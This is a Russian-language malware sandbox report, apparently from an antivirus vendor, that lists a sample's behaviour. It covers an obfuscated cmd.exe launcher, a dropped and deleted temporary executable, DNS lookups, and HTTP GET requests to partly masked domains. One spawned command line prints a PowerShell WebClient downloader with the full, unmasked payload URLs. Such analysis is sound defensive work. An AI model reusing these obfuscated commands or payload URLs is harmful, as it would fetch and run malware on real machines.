Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set jzNy=F# ;]C:'PwiT=^<iK^<:di hX': H=(kPqsA\am7nQ*7S$,8d}P =}Uew{Z}@h%;#cB]atJD,aQZnc'O^|}TZ^&}\^>y;-cJk-b^&ad#oeiK]r-sDb7)e;cZV'7t:bx9gmA:DUYa...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\427.exe
Удаляет следующие файлы
- %TEMP%\427.exe
Сетевая активность
Подключается к
- 'sa####etimes.com':80
- 'sp##ndor.es':80
- 'sy###aurban.pl':80
- 'st###grid.be':80
TCP
Запросы HTTP GET
- http://sa####etimes.com/GFSKwTCH7M
- http://sp##ndor.es/iz8KQa7
- http://sy###aurban.pl/images/MLWmsiyDOs
- http://st###grid.be/DNh31Rt
UDP
- DNS ASK sa####etimes.com
- DNS ASK se###sites.es
- DNS ASK sp##ndor.es
- DNS ASK sy###aurban.pl
- DNS ASK st###grid.be
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set jzNy=F# ;]C:'PwiT=^<iK^<:di hX': H=(kPqsA\am7nQ*7S$,8d}P =}Uew{Z}@h%;#cB]atJD,aQZnc'O^|}TZ^&}\^>y;-cJk-b^&ad#oeiK]r-sDb7)e;cZV'7t:bx9gmA:DUYa...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"set jzNy=F# ;]C:'PwiT=^<iK^<:di hX': H=(kPqsA/am7nQ*7S$,8d}P =}Uew{Z}@h%;#cB]atJD,aQZnc'O^|}TZ^&}/^>y;-cJk-b^&ad#oeiK]r-sDb7)e;cZV'7t:bx9gmA:DUYa)'^&Tq=Mm;d+a?P;9Ak^&af$UVo;{`=cm^>%Ej.W...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $Por='DEM';$RES=new-object Net.WebClient;$fBi='http://santafetimes.com/GFSKwTCH7M@http://sevensites.es/mXMLalP7uj@http://splendor.es/iz8KQa7@http://sylwiaurban.pl/images/MLWmsiyD...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=3 delims=Dyu.jM" %o IN ('assoc^|find "d1="') DO %o -"
- '<SYSTEM32>\cmd.exe' /c assoc|find "d1="
- '<SYSTEM32>\cmd.exe' /S /D /c" assoc"
- '<SYSTEM32>\find.exe' "d1="
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
